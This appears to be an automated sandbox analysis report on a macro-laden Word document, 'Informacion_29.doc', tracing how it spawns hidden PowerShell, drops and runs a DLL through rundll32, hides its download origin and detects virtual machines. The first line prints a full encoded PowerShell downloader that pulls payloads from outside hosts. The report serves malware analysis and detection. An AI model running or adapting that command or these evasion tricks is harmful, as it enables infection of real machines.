Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
Source: Informacion_29.doc Initial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7 Name: Jwq9b1lb0hmm7
Document contains an embedded VBA with many randomly named variables
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAEE117C22 push ds; ret 4_2_00007FFAEE117C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100037FB push ecx; ret 13_2_1000380E

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Ebern\dqxd.zpy

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ebern\dqxd.zpy:Zone.Identifier read attributes | delete
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\rundll32.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
